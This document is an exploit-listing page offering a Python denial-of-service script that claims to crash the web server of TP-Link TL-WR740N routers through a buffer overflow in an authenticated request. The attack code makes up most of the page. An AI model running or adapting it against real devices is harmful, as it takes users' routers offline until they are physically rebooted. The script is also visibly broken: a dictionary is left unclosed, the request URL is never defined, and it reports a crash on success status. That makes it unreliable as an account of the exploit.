TP-Link TL-WR740N Exploit, Buffer Overflow 'DOS'

# Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'
# Date: 8/12/2023
# Exploit Author: Anish Feroz (ZEROXINN)
# Vendor Homepage:
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
# Tested on: TP-Link TL-WR740N


#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.


#python3 target username password
#change port, if required



import requests
from requests.auth import HTTPBasicAuth
import base64

def send_request(ip, username, password):
    auth_url = f"http://{ip}:8082"

    credentials = f"{username}:{password}"
    encoded_credentials = base64.b64encode(credentials.encode()).decode()

    headers = {
        "Host": f"{ip}:8082",
        "Authorization": f"Basic {encoded_credentials}",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "close"

    session = requests.Session()

    response = session.get(target_url, headers=headers)

    if response.status_code == 200:
        print("Server Crashed")
        print(f"Script Completed with status code {response.status_code}")

ip_address = input("Enter IP address of the host: ")
username = input("Enter username: ")
password = input("Enter password: ")

send_request(ip_address, username, password)

All rights reserved 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD